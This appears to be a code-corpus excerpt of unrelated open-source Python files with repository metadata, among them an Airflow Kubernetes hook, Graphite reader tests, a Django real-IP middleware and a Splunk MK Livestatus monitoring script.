:param conn_id: the connection to Kubernetes cluster
:type conn_id: str
"""
conn_name_attr = 'kubernetes_conn_id'
default_conn_name = 'kubernetes_default'
conn_type = 'kubernetes'
hook_name = 'Kubernetes Cluster Connection'
@staticmethod
def get_connection_form_widgets() -> Dict[str, Any]:
"""Returns connection widgets to add to connection form"""
from flask_appbuilder.fieldwidgets import BS3TextFieldWidget
from flask_babel import lazy_gettext
from wtforms import BooleanField, StringField
return {
"extra__kubernetes__in_cluster": BooleanField(lazy_gettext('In cluster configuration')),
"extra__kubernetes__kube_config_path": StringField(
lazy_gettext('Kube config path'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__kube_config": StringField(
lazy_gettext('Kube config (JSON format)'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__namespace": StringField(
lazy_gettext('Namespace'), widget=BS3TextFieldWidget()
),
}
@staticmethod
def get_ui_field_behaviour() -> Dict:
"""Returns custom field behaviour"""
return {
"hidden_fields": ['host', 'schema', 'login', 'password', 'port', 'extra'],
"relabeling": {},
}
def __init__(
self, conn_id: str = default_conn_name, client_configuration: Optional[client.Configuration] = None
) -> None:
super().__init__()
self.conn_id = conn_id
self.client_configuration = client_configuration
def get_conn(self) -> Any:
"""Returns kubernetes api session for use with requests"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
in_cluster = extras.get("extra__kubernetes__in_cluster")
kubeconfig_path = extras.get("extra__kubernetes__kube_config_path")
kubeconfig = extras.get("extra__kubernetes__kube_config")
num_selected_configuration = len([o for o in [in_cluster, kubeconfig, kubeconfig_path] if o])
if num_selected_configuration > 1:
raise AirflowException(
"Invalid connection configuration. Options extra__kubernetes__kube_config_path, "
"extra__kubernetes__kube_config, extra__kubernetes__in_cluster are mutually exclusive. "
"You can only use one option at a time."
)
if in_cluster:
self.log.debug("loading kube_config from: in_cluster configuration")
config.load_incluster_config()
return client.ApiClient()
if kubeconfig_path is not None:
self.log.debug("loading kube_config from: %s", kubeconfig_path)
config.load_kube_config(
config_file=kubeconfig_path, client_configuration=self.client_configuration
)
return client.ApiClient()
if kubeconfig is not None:
with tempfile.NamedTemporaryFile() as temp_config:
self.log.debug("loading kube_config from: connection kube_config")
temp_config.write(kubeconfig.encode())
temp_config.flush()
config.load_kube_config(
config_file=temp_config.name, client_configuration=self.client_configuration
)
return client.ApiClient()
self.log.debug("loading kube_config from: default file")
config.load_kube_config(client_configuration=self.client_configuration)
return client.ApiClient()
@cached_property
def api_client(self) -> Any:
"""Cached Kubernetes API client"""
return self.get_conn()
def create_custom_object(
self, group: str, version: str, plural: str, body: Union[str, dict], namespace: Optional[str] = None
):
"""
Creates custom resource definition object in Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param body: crd object definition
:type body: Union[str, dict]
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
if isinstance(body, str):
body = _load_body_to_dict(body)
try:
response = api.create_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, body=body
)
self.log.debug("Response: %s", response)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> create_custom_object: %s\n" % e)
def get_custom_object(
self, group: str, version: str, plural: str, name: str, namespace: Optional[str] = None
):
"""
Get custom resource definition object from Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param name: crd object name
:type name: str
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
try:
response = api.get_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, name=name
)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> get_custom_object: %s\n" % e)
def get_namespace(self) -> str:
"""Returns the namespace that defined in the connection"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
namespace = extras.get("extra__kubernetes__namespace", "default")
return namespace
def get_pod_log_stream(
self,
pod_name: str,
container: Optional[str] = "",
namespace: Optional[str] = None,
) -> Tuple[watch.Watch, Generator[str, None, None]]:
"""
Retrieves a log stream for a container in a kubernetes pod.
:param pod_name: pod name
:type pod_name: str
:param container: container name
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CoreV1Api(self.api_client)
watcher = watch.Watch()
return (
watcher,
watcher.stream(
api.read_namespaced_pod_log,
name=pod_name,
container=container,
namespace=namespace if namespace else self.get_namespace(),
),
)
def get_pod_logs(
self,
pod_name: str,
container: Optional[str] = "",
namespace: Optional[str] = None,
):
"""
Retrieves a container's log from the specified pod.
:param pod_name: pod name
:type pod_name: str
:param container: container name
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CoreV1Api(self.api_client)
return api.read_namespaced_pod_log(
name=pod_name,
container=container,
_preload_content=False,
namespace=namespace if namespace else self.get_namespace(),
)
|
airbnb/airflow
|
airflow/providers/cncf/kubernetes/hooks/kubernetes.py
|
Python
|
apache-2.0
| 9,757
| 0.002152
|
"""
Handling signals of the `core` app
"""
from django.dispatch import receiver
from core import signals
from reader import actions
@receiver(signals.app_link_ready)
def app_link_ready(sender, **kwargs):
actions.create_app_link()
|
signaldetect/messity
|
reader/receivers/core.py
|
Python
|
mit
| 238
| 0
|
from setuptools import setup
setup(
name="agentarchives",
description="Clients to retrieve, add, and modify records from archival management systems",
url="https://github.com/artefactual-labs/agentarchives",
author="Artefactual Systems",
author_email="info@artefactual.com",
license="AGPL 3",
version="0.7.0",
packages=[
"agentarchives",
"agentarchives.archivesspace",
"agentarchives.archivists_toolkit",
"agentarchives.atom",
],
install_requires=["requests>=2,<3", "mysqlclient>=1.3,<2"],
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*",
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
|
artefactual-labs/agentarchives
|
setup.py
|
Python
|
agpl-3.0
| 1,074
| 0.000931
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ..proto.summary_pb2 import Summary
from ..proto.summary_pb2 import SummaryMetadata
from ..proto.tensor_pb2 import TensorProto
from ..proto.tensor_shape_pb2 import TensorShapeProto
import os
import time
import numpy as np
# import tensorflow as tf
# from tensorboard.plugins.beholder import im_util
# from . import im_util
from .file_system_tools import read_pickle,\
write_pickle, write_file
from .shared_config import PLUGIN_NAME, TAG_NAME,\
SUMMARY_FILENAME, DEFAULT_CONFIG, CONFIG_FILENAME, SUMMARY_COLLECTION_KEY_NAME, SECTION_INFO_FILENAME
from . import video_writing
# from .visualizer import Visualizer
class Beholder(object):
def __init__(self, logdir):
self.PLUGIN_LOGDIR = logdir + '/plugins/' + PLUGIN_NAME
self.is_recording = False
self.video_writer = video_writing.VideoWriter(
self.PLUGIN_LOGDIR,
outputs=[video_writing.FFmpegVideoOutput, video_writing.PNGVideoOutput])
self.last_image_shape = []
self.last_update_time = time.time()
self.config_last_modified_time = -1
self.previous_config = dict(DEFAULT_CONFIG)
if not os.path.exists(self.PLUGIN_LOGDIR + '/config.pkl'):
os.makedirs(self.PLUGIN_LOGDIR)
write_pickle(DEFAULT_CONFIG,
'{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME))
# self.visualizer = Visualizer(self.PLUGIN_LOGDIR)
def _get_config(self):
'''Reads the config file from disk or creates a new one.'''
filename = '{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME)
modified_time = os.path.getmtime(filename)
if modified_time != self.config_last_modified_time:
config = read_pickle(filename, default=self.previous_config)
self.previous_config = config
else:
config = self.previous_config
self.config_last_modified_time = modified_time
return config
def _write_summary(self, frame):
'''Writes the frame to disk as a tensor summary.'''
path = '{}/{}'.format(self.PLUGIN_LOGDIR, SUMMARY_FILENAME)
smd = SummaryMetadata()
tensor = TensorProto(
dtype='DT_FLOAT',
float_val=frame.reshape(-1).tolist(),
tensor_shape=TensorShapeProto(
dim=[TensorShapeProto.Dim(size=frame.shape[0]),
TensorShapeProto.Dim(size=frame.shape[1]),
TensorShapeProto.Dim(size=frame.shape[2])]
)
)
summary = Summary(value=[Summary.Value(
tag=TAG_NAME, metadata=smd, tensor=tensor)]).SerializeToString()
write_file(summary, path)
@staticmethod
def stats(tensor_and_name):
imgstats = []
for (img, name) in tensor_and_name:
immax = img.max()
immin = img.min()
imgstats.append(
{
'height': img.shape[0],
'max': str(immax),
'mean': str(img.mean()),
'min': str(immin),
'name': name,
'range': str(immax - immin),
'shape': str((img.shape[1], img.shape[2]))
})
return imgstats
def _get_final_image(self, config, trainable=None, arrays=None, frame=None):
if config['values'] == 'frames':
# print('===frames===')
final_image = frame
elif config['values'] == 'arrays':
# print('===arrays===')
final_image = np.concatenate([arr for arr, _ in arrays])
stat = self.stats(arrays)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
elif config['values'] == 'trainable_variables':
# print('===trainable===')
final_image = np.concatenate([arr for arr, _ in trainable])
stat = self.stats(trainable)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
if len(final_image.shape) == 2: # Map grayscale images to 3D tensors.
final_image = np.expand_dims(final_image, -1)
return final_image
def _enough_time_has_passed(self, FPS):
'''For limiting how often frames are computed.'''
if FPS == 0:
return False
else:
earliest_time = self.last_update_time + (1.0 / FPS)
return time.time() >= earliest_time
def _update_frame(self, trainable, arrays, frame, config):
final_image = self._get_final_image(config, trainable, arrays, frame)
self._write_summary(final_image)
self.last_image_shape = final_image.shape
return final_image
def _update_recording(self, frame, config):
'''Adds a frame to the current video output.'''
# pylint: disable=redefined-variable-type
should_record = config['is_recording']
if should_record:
if not self.is_recording:
self.is_recording = True
print('Starting recording using %s',
self.video_writer.current_output().name())
self.video_writer.write_frame(frame)
elif self.is_recording:
self.is_recording = False
self.video_writer.finish()
print('Finished recording')
# TODO: blanket try and except for production? I don't someone's script to die
# after weeks of running because of a visualization.
def update(self, trainable=None, arrays=None, frame=None):
'''Creates a frame and writes it to disk.
Args:
trainable: a list of namedtuple (tensors, name).
arrays: a list of namedtuple (tensors, name).
frame: lalala
'''
new_config = self._get_config()
if True or self._enough_time_has_passed(self.previous_config['FPS']):
# self.visualizer.update(new_config)
self.last_update_time = time.time()
final_image = self._update_frame(
trainable, arrays, frame, new_config)
self._update_recording(final_image, new_config)
##############################################################################
# @staticmethod
# def gradient_helper(optimizer, loss, var_list=None):
# '''A helper to get the gradients out at each step.
# Args:
# optimizer: the optimizer op.
# loss: the op that computes your loss value.
# Returns: the gradient tensors and the train_step op.
# '''
# if var_list is None:
# var_list = tf.trainable_variables()
# grads_and_vars = optimizer.compute_gradients(loss, var_list=var_list)
# grads = [pair[0] for pair in grads_and_vars]
# return grads, optimizer.apply_gradients(grads_and_vars)
# implements pytorch backward later
class BeholderHook():
pass
# """SessionRunHook implementation that runs Beholder every step.
# Convenient when using tf.train.MonitoredSession:
# ```python
# beholder_hook = BeholderHook(LOG_DIRECTORY)
# with MonitoredSession(..., hooks=[beholder_hook]) as sess:
# sess.run(train_op)
# ```
# """
# def __init__(self, logdir):
# """Creates new Hook instance
# Args:
# logdir: Directory where Beholder should write data.
# """
# self._logdir = logdir
# self.beholder = None
# def begin(self):
# self.beholder = Beholder(self._logdir)
# def after_run(self, run_context, unused_run_values):
# self.beholder.update(run_context.session)
|
lanpa/tensorboardX
|
tensorboardX/beholder/beholder.py
|
Python
|
mit
| 8,355
| 0.000838
|
from .base import TestCase
import os
import shutil
import time
from django.conf import settings
import whisper
import gzip
from graphite.readers import WhisperReader, FetchInProgress, MultiReader, merge_with_cache
from graphite.wsgi import application # NOQA makes sure we have a working WSGI app
from graphite.node import LeafNode
class MergeWithCacheTests(TestCase):
maxDiff = None
def test_merge_with_cache_with_different_step_no_data(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, None))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(None)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_sum(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(60)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_average(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='average'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_max(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='max'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_min(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='min'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_last(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='last'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_bad(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
with self.assertRaisesRegexp(Exception, "Invalid consolidation function: 'bad_function'"):
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='bad_function'
)
# In merge_with_cache, if the `values[i] = value` fails, then
# the try block catches the exception and passes. This tests
# that case.
def test_merge_with_cache_beyond_max_range(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size, start+window_size*2, 1):
cache_results.append((i, None))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(None)
self.assertEqual(expected_values, values)
def test_merge_with_cache_when_previous_window_in_cache(self):
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 3600 # (1 hour)
step = 60 # (1 minute)
# simulate db data, no datapoints for the given
# time window
values = self._create_none_window(step)
# simulate cached data with datapoints only
# from the previous window
cache_results = []
prev_window_start = start - window_size
prev_window_end = prev_window_start + window_size
for i in range(prev_window_start, prev_window_end, step):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values
)
# the merged results should be a None window because:
# - db results for the window are None
# - cache does not contain relevant points
self.assertEqual(self._create_none_window(step), values)
@staticmethod
def _create_none_window(points_per_window):
return [None for _ in range(0, points_per_window)]
#
# Test MultiReader with multiple WhisperReader instances
#
class MultiReaderTests(TestCase):
start_ts = 0
# Create/wipe test whisper files
hostcpu = os.path.join(settings.WHISPER_DIR, 'hosts/hostname/cpu.wsp')
worker1 = hostcpu.replace('hostname', 'worker1')
worker2 = hostcpu.replace('hostname', 'worker2')
worker3 = hostcpu.replace('hostname', 'worker3')
worker4 = hostcpu.replace('hostname', 'worker4')
worker4 = worker4.replace('cpu.wsp', 'cpu.wsp.gz')
def create_whisper_hosts(self):
self.start_ts = int(time.time())
try:
os.makedirs(self.worker1.replace('cpu.wsp', ''))
os.makedirs(self.worker2.replace('cpu.wsp', ''))
os.makedirs(self.worker3.replace('cpu.wsp', ''))
os.makedirs(self.worker4.replace('cpu.wsp.gz', ''))
except OSError:
pass
whisper.create(self.worker1, [(1, 60)])
whisper.create(self.worker2, [(1, 60)])
open(self.worker3, 'a').close()
whisper.update(self.worker1, 1, self.start_ts)
whisper.update(self.worker2, 2, self.start_ts)
with open(self.worker1, 'rb') as f_in, gzip.open(self.worker4, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
def wipe_whisper_hosts(self):
try:
os.remove(self.worker1)
os.remove(self.worker2)
os.remove(self.worker3)
os.remove(self.worker4)
shutil.rmtree(os.path.join(settings.WHISPER_DIR, 'hosts'))
except OSError:
pass
def test_MultiReader_init(self):
self.create_whisper_hosts()
self.addCleanup(self.wipe_whisper_hosts)
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
wr2 = WhisperReader(self.worker2, 'hosts.worker2.cpu')
node2 = LeafNode('hosts.worker2.cpu', wr2)
reader = MultiReader([node1, node2])
self.assertIsNotNone(reader)
# Confirm the intervals
# Because the intervals returned from Whisper are subsecond,
# we truncate to int for this comparison, otherwise it's impossible
def test_MultiReader_get_intervals(self):
self.create_whisper_hosts()
self.addCleanup(self.wipe_whisper_hosts)
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
wr2 = WhisperReader(self.worker2, 'hosts.worker2.cpu')
node2 = LeafNode('hosts.worker2.cpu', wr2)
reader = MultiReader([node1, node2])
intervals = reader.get_intervals()
for interval in intervals:
self.assertEqual(int(interval.start), self.start_ts-60)
self.assertEqual(int(interval.end), self.start_ts)
# Confirm fetch works.
def test_MultiReader_fetch(self):
self.create_whisper_hosts()
self.addCleanup(self.wipe_whisper_hosts)
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
wr2 = WhisperReader(self.worker2, 'hosts.worker2.cpu')
node2 = LeafNode('hosts.worker2.cpu', wr2)
reader = MultiReader([node1, node2])
results = reader.fetch(self.start_ts-5, self.start_ts)
self.assertIsInstance(results, FetchInProgress)
if isinstance(results, FetchInProgress):
results = results.waitForResults()
(_, values) = results
self.assertEqual(values, [None, None, None, None, 1.0])
# Confirm merge works.
def test_MultiReader_merge_normal(self):
results1 = ((1496252939, 1496252944, 1), [None, None, None, None, 1.0])
results2 = ((1496252939, 1496252944, 1), [1.0, 1.0, 1.0, 1.0, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, 1.0, 1.0, 1.0])
def test_MultiReader_merge_results1_finer_than_results2(self):
results1 = ((1496252939, 1496252944, 1), [1.0, None, None, None, 1.0])
results2 = ((1496252939, 1496252949, 5), [1.0, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
def test_MultiReader_merge_results2_finer_than_results1(self):
results1 = ((1496252939, 1496252949, 5), [1.0, 1.0])
results2 = ((1496252939, 1496252944, 1), [1.0, None, 1.0, None, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0])
def test_MultiReader_merge_results1_missing_some(self):
results1 = ((1496252939, 1496252944, 1), [1.0, None, None, None, 1.0])
results2 = ((1496252939, 1496252949, 1), [1.0, 1.0])
wr1 = WhisperReader(self.worker1, 'hosts.worker1.cpu')
node1 = LeafNode('hosts.worker1.cpu', wr1)
reader = MultiReader([node1])
(_, values) = reader.merge(results1, results2)
self.assertEqual(values, [1.0, 1.0, None, None, 1.0, None, None, None, None, None])
|
gwaldo/graphite-web
|
webapp/tests/test_readers_util.py
|
Python
|
apache-2.0
| 16,540
| 0.000665
|
# Copyright (c) 2012-2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Weigh cells by memory needed in a way that spreads instances.
"""
from oslo.config import cfg
from nova.cells import weights
ram_weigher_opts = [
cfg.FloatOpt('ram_weight_multiplier',
default=10.0,
help='Multiplier used for weighing ram. Negative '
'numbers mean to stack vs spread.'),
]
CONF = cfg.CONF
CONF.register_opts(ram_weigher_opts, group='cells')
class RamByInstanceTypeWeigher(weights.BaseCellWeigher):
"""Weigh cells by instance_type requested."""
def weight_multiplier(self):
return CONF.cells.ram_weight_multiplier
def _weigh_object(self, cell, weight_properties):
"""Use the 'ram_free' for a particular instance_type advertised from a
child cell's capacity to compute a weight. We want to direct the
build to a cell with a higher capacity. Since higher weights win,
we just return the number of units available for the instance_type.
"""
request_spec = weight_properties['request_spec']
instance_type = request_spec['instance_type']
memory_needed = instance_type['memory_mb']
ram_free = cell.capacities.get('ram_free', {})
units_by_mb = ram_free.get('units_by_mb', {})
return units_by_mb.get(str(memory_needed), 0)
|
ChinaMassClouds/copenstack-server
|
openstack/src/nova-2014.2/nova/cells/weights/ram_by_instance_type.py
|
Python
|
gpl-2.0
| 1,971
| 0
|
from django.conf import settings
from .func import (check_if_trusted,
get_from_X_FORWARDED_FOR as _get_from_xff,
get_from_X_REAL_IP)
trusted_list = (settings.REAL_IP_TRUSTED_LIST
if hasattr(settings, 'REAL_IP_TRUSTED_LIST')
else [])
def get_from_X_FORWARDED_FOR(header):
return _get_from_xff(header, trusted_list)
func_map = {'HTTP_X_REAL_IP': get_from_X_REAL_IP,
'HTTP_X_FORWARDED_FOR': get_from_X_FORWARDED_FOR}
real_ip_headers = (settings.REAL_IP_HEADERS
if hasattr(settings, 'REAL_IP_HEADERS')
else ['HTTP_X_REAL_IP', 'HTTP_X_FORWARDED_FOR'])
class DjangoRealIPMiddleware(object):
def process_request(self, request):
if not check_if_trusted(request.META['REMOTE_ADDR'], trusted_list):
# Only header from trusted ip can be used
return
for header_name in real_ip_headers:
try:
# Get the parsing function
func = func_map[header_name]
# Get the header value
header = request.META[header_name]
except KeyError:
continue
# Parse the real ip
real_ip = func(header)
if real_ip:
request.META['REMOTE_ADDR'] = real_ip
break
|
Daishi1223/py-http-realip
|
http_realip/middlewares.py
|
Python
|
mit
| 1,364
| 0.002933
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Project and Analytic Account integration impprovements',
'version': '8.0.1.0.0',
'category': 'Projects & Services',
'sequence': 14,
'summary': '',
'description': """
Project and Analytic Account integration impprovements.
=======================================================
Adds domains restriction to project task so that only projets that use task and are not in cancelled, done or tempalte state, can be choosen.
Adds domains restriction to timesheet records so that only
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'project_timesheet',
'hr_timesheet_invoice',
],
'data': [
'project_timesheet_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
HBEE/odoo-addons
|
project_analytic_integration/__openerp__.py
|
Python
|
agpl-3.0
| 1,908
| 0.002096
|
# Script to request hosts with DOWN status and total hosts by accessing MK Livestatus
# Required field to be passed to this script from Splunk: n/a
import socket,string,sys,re,splunk.Intersplunk,mklivestatus
results = []
try:
results,dummyresults,settings = splunk.Intersplunk.getOrganizedResults()
for r in results:
try:
HOST = mklivestatus.HOST
PORT = mklivestatus.PORT
s = None
livehostsdown = 0
livehoststotal = 0
for h in HOST:
content = [ "GET hosts\nStats: state = 1\nStats: state != 9999\n" ]
query = "".join(content)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((h, PORT))
except socket.error, (value,message):
if s:
s.close()
#Error: Could not open socket: connection refused (MK Livestatus not setup in xinetd?)
break
s.send(query)
s.shutdown(socket.SHUT_WR)
data = s.recv(100000000)
data2 = (re.findall(r'(No UNIX socket)', data))
if data2:
#Error: MK Livestatus module not loaded?
s.close()
else:
livehosts2 = data.strip()
livehosts = livehosts2.split(";")
s.close()
livehostsdownind = int(livehosts[0])
livehoststotalind = int(livehosts[1])
livehostsdown = livehostsdown + livehostsdownind
livehoststotal = livehoststotal + livehoststotalind
r["livehostsdownstatus"] = livehostsdown
r["livehoststotalstatus"] = livehoststotal
except:
r["livehostsdownstatus"] = "0"
r["livehoststotalstatus"] = "0"
except:
import traceback
stack = traceback.format_exc()
results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
splunk.Intersplunk.outputResults( results )
|
skywalka/splunk-for-nagios
|
bin/livehostsdownstatus.py
|
Python
|
gpl-3.0
| 1,840
| 0.044565
|
import pyspeckit
import os
from pyspeckit.spectrum.models import nh2d
import numpy as np
import astropy.units as u
if not os.path.exists('p-nh2d_spec.fits'):
import astropy.utils.data as aud
from astropy.io import fits
